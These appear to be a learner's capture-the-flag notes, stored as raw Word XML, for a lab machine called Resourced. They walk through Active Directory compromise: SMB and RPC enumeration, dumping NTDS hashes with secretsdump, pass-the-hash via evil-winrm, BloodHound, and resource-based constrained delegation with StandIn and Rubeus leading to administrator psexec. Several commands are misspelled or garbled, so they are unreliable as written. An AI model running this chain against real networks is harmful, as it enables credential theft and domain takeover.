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663E397B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C04D81">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resourced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C217F3D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C04D81">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sC -sV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4712A6C6" w:rsidR="00843DCE" w:rsidRDefault="00D0739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smbclient -L </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00BA68C1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>\\\\recoured.pg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= nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E365DF" w14:textId="6DA8D298" w:rsidR="00D07392" w:rsidRDefault="00D0739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enum4linux = resourced.pg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114784BD" w14:textId="07948F99" w:rsidR="00D07392" w:rsidRDefault="00D0739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got the user list so take the notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C1D943" w14:textId="25DFA474" w:rsidR="00D07392" w:rsidRDefault="00D0739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last user has passwords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601A3112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rpcclient -U’’%’’ t_ip = anonymous without password as -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D9758D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querydispinfo = for same list of user name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7F7F49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smbcclient -L </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00BA68C1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>\\\\t_ip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-U resourced/v.vrntz = to access that user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6242DDEC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impacket-smbclient v.ventz:’paste’@resourced.pg = for perfect access of shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A488EBC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 Password Audit = ls we see we are access it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C98A0A3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active directory and mget * = to download all files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565734A0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ntds.dir and jfm are use for find data of active directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8ACCCB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download the registry option too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DF6C73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impacket-secretsdump -ntds ntds.dit -system SYSTEM -sam SAM LOCAL |tee secrets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7EF70DAC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and we get all username and hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D48741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cat secrets | cut -d “:” -f1 | tee users.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0255A78D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secrets | cut -d “:” -f4 | tee hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B098505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nxc winrm t_ip -u user.txt -H has.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2740DE85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evil-winrm -I t_ip -u l.lavingstone -H hash = we have access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA56CA7" w14:textId="77777777" w:rsidR="00910A16" w:rsidRDefault="00910A16" w:rsidP="00910A1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local.txt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3F31915D" w:rsidR="00843DCE" w:rsidRDefault="008E1E4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 the bloodhound with neo4j server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1804CEFE" w14:textId="21C7DCB7" w:rsidR="008E1E41" w:rsidRDefault="008E1E4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 upload sharphound.exe</w:t>
      </w:r>
      <w:r w:rsidR="00A80C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at dosuments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0C1289" w14:textId="22250661" w:rsidR="008E1E41" w:rsidRDefault="008E1E4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upload /home/kali/SharpHound.exe Sharphound.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AD6405" w14:textId="5DB8A45D" w:rsidR="008E1E41" w:rsidRDefault="00A80C4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./SharpHound.exe -c all,gpolocalgroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3326D940" w14:textId="3D764DAD" w:rsidR="00A80C44" w:rsidRDefault="00A80C4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download xxxxxxx_bloodhounc.zip = if need path then /home/kali/b1.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DB9FD6" w14:textId="315D9523" w:rsidR="00A80C44" w:rsidRDefault="00A80C4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upload it to the bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2305222D" w14:textId="77777777" w:rsidR="00A80C44" w:rsidRDefault="00A80C44" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E320C25" w14:textId="7B0F959D" w:rsidR="00A80C44" w:rsidRDefault="00A80C4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search for l.livingstone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5435E4" w14:textId="704B8081" w:rsidR="00A80C44" w:rsidRDefault="00A80C4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outbound we obtain the connection and we can try that steps too</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DABA184" w14:textId="1C2A2CA2" w:rsidR="00A80C44" w:rsidRDefault="00A80C4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but here we don’t. youtuber has his own steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089BA1EC" w14:textId="77777777" w:rsidR="00A80C44" w:rsidRDefault="00A80C44" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67AC01EE" w14:textId="43F6A237" w:rsidR="00A80C44" w:rsidRDefault="00A80C4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upload standIn_v3_Net45.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6575E054" w14:textId="2F60484C" w:rsidR="00A80C44" w:rsidRDefault="00A80C4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upload rebeus.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C5C61A" w14:textId="310015C5" w:rsidR="00A80C44" w:rsidRDefault="00A80C4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./StdIn.exe - -computer xct - -make = creating new compute account for us with pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77716459" w14:textId="6FAE59F6" w:rsidR="00A80C44" w:rsidRDefault="00A80C4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Get-ADComputer -Filter * | Select-Object Name, SID</w:t>
      </w:r>
      <w:r w:rsidR="00EF1420">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = obtain sid with name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128D550F" w14:textId="7F3D43B6" w:rsidR="00A80C44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./StandIn.exe - -computer ResourceD - -sid s-123w-2-34---23-1—1-23—21 = to set attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1394EE9C" w14:textId="77777777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</w:p>
    <w:p w14:paraId="2DAA6A9F" w14:textId="7848E48B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terminal = python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BAF54F" w14:textId="4F55280F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import hashlib.binascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBF4DC3" w14:textId="1D0E5131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hash=hashlib.new(‘md4’,”pastepaswordviashell”.encode(‘utf-16le’)).digest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C344BA8" w14:textId="39403711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print(binacsii.hexlify(hash))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBBB48B" w14:textId="0CBB04D7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copy what we obtain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32882425" w14:textId="77777777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</w:p>
    <w:p w14:paraId="37F4888D" w14:textId="60CC5B40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./Rubeus.exe s4u /user:xct /rc4:paste /impersonateuser:administrator /msdsspn:cifs/resourcedc.resourced.local /nowrap /ptt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AA756D" w14:textId="540EB6A4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 showcase success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CDE42" w14:textId="27CB2925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klist = as have correct ticket of administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC51BA" w14:textId="20FC92CC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copy the base64 blocks in terminal from rebeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353A1C3F" w14:textId="77777777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</w:p>
    <w:p w14:paraId="56729047" w14:textId="19CD0264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terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC47416" w14:textId="41082FEF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 ticket.b64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62075F38" w14:textId="01F2AAC7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ticket.b64 | base64 -d &gt; ticket.kribi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC38081" w14:textId="45640B5E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impacket-ticketConverter ticker.lribiticket.ccache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D72307D" w14:textId="3C336FF2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export KRB5CCNAME=`pwd`/ticket.ccache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E401F6" w14:textId="016BC81F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klist = and ticket is now loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB47101" w14:textId="2A7047BA" w:rsidR="00EF1420" w:rsidRDefault="00EF1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impacket-psexec -k -no-pass </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00BA68C1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>resourced.local/administrator@resourced.resourced.local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-dc-ip t_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C50D1A" w14:textId="03CE1D35" w:rsidR="008240E3" w:rsidRDefault="008240E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have root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17C4D898" w:rsidR="00A311DF" w:rsidRPr="00843DCE" w:rsidRDefault="00706B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On Desktop we have proof.txt</w:t>
      </w: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104001"/>
    <w:rsid w:val="0030069E"/>
    <w:rsid w:val="003763E1"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="0048745A"/>
    <w:rsid w:val="00706B1A"/>
    <w:rsid w:val="00734310"/>
    <w:rsid w:val="00801208"/>
    <w:rsid w:val="008240E3"/>
    <w:rsid w:val="00842AAB"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00855CA0"/>
    <w:rsid w:val="008E1E41"/>
    <w:rsid w:val="00910A16"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A80C44"/>
    <w:rsid w:val="00C04D81"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D07392"/>
    <w:rsid w:val="00EF1420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3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3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sourced.local/administrator@resourced.resourced.local" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\\\t_ip" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\\\recoured.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12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-12T17:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>